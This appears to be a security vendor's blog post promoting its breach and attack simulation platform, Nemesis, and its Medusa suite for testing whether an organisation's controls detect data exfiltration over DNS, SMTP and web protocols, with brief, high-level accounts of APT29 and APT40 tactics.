top of page

Simulating Data Exfiltration with Nemesis

  • Writer: Markus Vervier
    Markus Vervier
  • May 15
  • 5 min read

In today's threat landscape, cybersecurity teams face a critical challenge: preventing sensitive data from leaving their networks through unauthorized channels. This process, known as data exfiltration, is a primary objective for threat actors. While organizations invest heavily in prevention mechanisms, how can they be certain these controls work effectively without testing them in real-world scenarios?


Enter Nemesis, our comprehensive breach and attack simulation platform, and its specialized data exfiltration testing suite, Medusa. Nemesis allows security teams to safely simulate data theft attempts across various protocols, providing actionable insights without risking actual data compromise:


  • Ensuring your Data Loss Prevention tools actually detect and block suspicious outbound traffic.

  • Confirming your SOC can identify unusual data movement patterns across different protocols, as well as fine-tune their ability to detect and react to exfiltration attempts in real-time.

  • Discovering which exfiltration channels might be overlooked by your current security stack.


Attackers frequently employ standard protocols like SMTP (email), DNS (domain name resolution), or standard web protocols likes HTTP or FTP, to conceal and transfer stolen data. A number of data exfiltration techniques implementing these protocols are available in Nemesis by default:


Exfitration techniques supported by Nemesis.
Exfitration techniques supported by Nemesis.




Advanced Testing Capabilities: Flexible Data Sizes and Time-Based Simulations

One of Nemesis most powerful features is its ability to simulate real-world adversary behavior through advanced customization of exfiltration parameters. This can be done in a very easy way in a single configuration step:


Configuration of Medusa DNS exfiltration default options.
Configuration of Medusa DNS exfiltration default options.


Arbitrary Data Size Testing

Unlike basic testing tools that use fixed-size data packets, Nemesis allows you to precisely calibrate the amount of data being exfiltrated, and how often you want to send it:


  • Micro-exfiltration Detection: Test your controls against the exfiltration of small data chunks (kilobytes of data) that often fly under the radar of traditional DLP solutions

  • Large-scale Data Theft Simulation: Validate your controls can detect the theft of gigabytes of data exfiltrated over one or multiple protocols, with variable delays

  • Data Type Simulation: Configure simulations to mimic the exfiltration of specific data types like auto-generated credit card numbers, social security numbers, or any custom file — allowing you to test data-aware security controls over plaintext and encrypted protocols.


One of our Nemesis customers discovered that while their security tools detected large data exfiltration attempts, they consistently missed smaller, more frequent exfiltration patterns that stayed under their default thresholds. This crucial vulnerability was identified specifically through a Nemesis exfiltration simulation.



Time-Based Exfiltration Testing

Modern attackers rarely execute data theft in a single operation. Instead, they employ sophisticated timing techniques to evade detection:


  • Scheduled Exfiltration: Set up tests to run at specific times or intervals, testing your round-the-clock monitoring capabilities

  • Delayed Execution: Configure simulations that activate hours or days after initial setup, mimicking dormant malware behavior

  • Interval-Based Testing: Simulate persistent attackers who extract small amounts of data at regular intervals over extended periods

  • Business-Hours Alignment: Test whether your SOC is equally effective at detecting exfiltration during business hours versus overnight or weekend periods


A financial services client used Medusa's delayed execution testing to discover that their nighttime SOC rotation had significantly longer detection times for subtle data exfiltration techniques—a gap they were able to address through additional training.




Real-World APT Exfiltration Techniques

Recent advanced persistent threat (APT) campaigns demonstrate why testing for exfiltration techniques is not just theoretical but essential for modern security postures:


APT29 (Cozy Bear)

This Russia-linked threat actor, active as recently as mid-2024, has refined their DNS exfiltration techniques to evade detection. Their operations against government and diplomatic targets utilized a sophisticated DNS tunneling mechanism that fragmented stolen data into micro-chunks embedded in DNS requests. The DNS requests were timed to mimic normal network traffic patterns, making them extremely difficult to distinguish from legitimate traffic.


Security researchers identified these exfiltration attempts only after significant delays, as the DNS requests were deliberately designed to stay below volume thresholds that would trigger alerts. Nemesis Medusa can simulate these exact patterns to validate whether your security controls would detect similar sophisticated attempts.


APT40 (Bronze Mohawk)

Operating with a focus on maritime industries and research institutions, this group has implemented a multi-protocol approach to data exfiltration. In campaigns observed through mid-2024, they established redundant exfiltration channels using both DNS and SMTP protocols.


Their most notable innovation was implementing "protocol hopping" where data theft would automatically switch between different protocols when resistance was encountered. For example, if DNS exfiltration was blocked, their malware would seamlessly switch to HTTPS or even FTP fallbacks without requiring additional command and control instructions. This resilient approach meant that blocking a single channel was insufficient to prevent data loss. With Nemesis Medusa, these sophisticated protocol-hopping techniques can be simulated to ensure your organization's defenses address all potential avenues of exfiltration.




Exfiltrating Data with Nemesis

Medusa simulates the techniques used by actual threat actors to extract data from your network. It creates controlled, non-malicious simulations that mimic real exfiltration attempts, allowing you to test your defenses without risk.


The following illustrates data exfiltration techniques using DNS and SMTP/S. However, Medusa provides the flexibility to exfiltrate data over various other protocols, including HTTP, HTTPS, FTP, and FTPS.



DNS Exfiltration

Exfiltrating over DNS remains one of the most elusive exfiltration techniques because it leverages a protocol that's rarely blocked or analyzed at network boundaries.


This simulation encodes data into DNS queries sent to the Nemesis controlled domain nemesis.services, where the Medusa handlers are listening, mimicking how attackers might extract small chunks of data through seemingly legitimate DNS traffic. Your security controls should detect this unusual pattern of oversized and high-frequency DNS requests.


The screenshot below shows the Nemesis Medusa logs at the top, while at the bottom you can see Wireshark running on a Windows 11 machine running the Nemesis agent. You can clearly see the long A record DNS queries being sent to the nemesis.services domain, containing the encoded data to exfiltrate.


Nemesis generating long DNS queries with encoded data.
Nemesis generating long DNS queries with encoded data.


SMTP/S Exfiltration

Email remains a common vector for data theft, with sensitive information hidden in attachments or even the body of messages. 


This test attempts to exfiltrate data by embedding it in attachments sent via email over plaintext SMTP, testing your email gateway's ability to analyze outbound content for sensitive information patterns.


The screenshot below shows the raw SMTP traffic going out of the network and being intercepted with Wireshark. Note the email MIME multipart section where the data is exfiltrated.



Nemesis generating SMTP traffic exfiltrating via email attachments.
Nemesis generating SMTP traffic exfiltrating via email attachments.

To make things more complicated for network traffic analysis, an attacker would exfiltrate over an encrypted channel using SMTPS (using STARTTLS), as shown in the screenshot below:


Nemesis generating realistic SMTP traffic with TLS encryption.
Nemesis generating realistic SMTP traffic with TLS encryption.

Nemesis provides comprehensive results for each simulated data exfiltration method. This includes details on timing and, if network traffic blocking prevents successful exfiltration, information regarding the prevention measures.



Nemesis exfiltration results for a specific execution.
Nemesis exfiltration results for a specific execution.


Conclusions

The repeatability and customization options of Nemesis Medusa's testing capabilities, from arbitrary data sizes and types to scheduled and delayed exfiltration simulations, provide unprecedented visibility into your organization's ability to detect and prevent data theft. This level of continuous validation is essential not just for technical security, but also for regulatory compliance.


The sophistication of data exfiltration attempts continues to evolve, shouldn't your testing methods evolve with them? Contact us today to learn how Nemesis can strengthen your organization's defense against data exfiltration threats.



 
 
 

Comments

Want to learn more about how Nemesis can help you?

Fill in the form and we will contact you shortly or you can always reach us out via: info@persistent-security.net

Fill in the form with any question you have, so we can get in contact.

bottom of page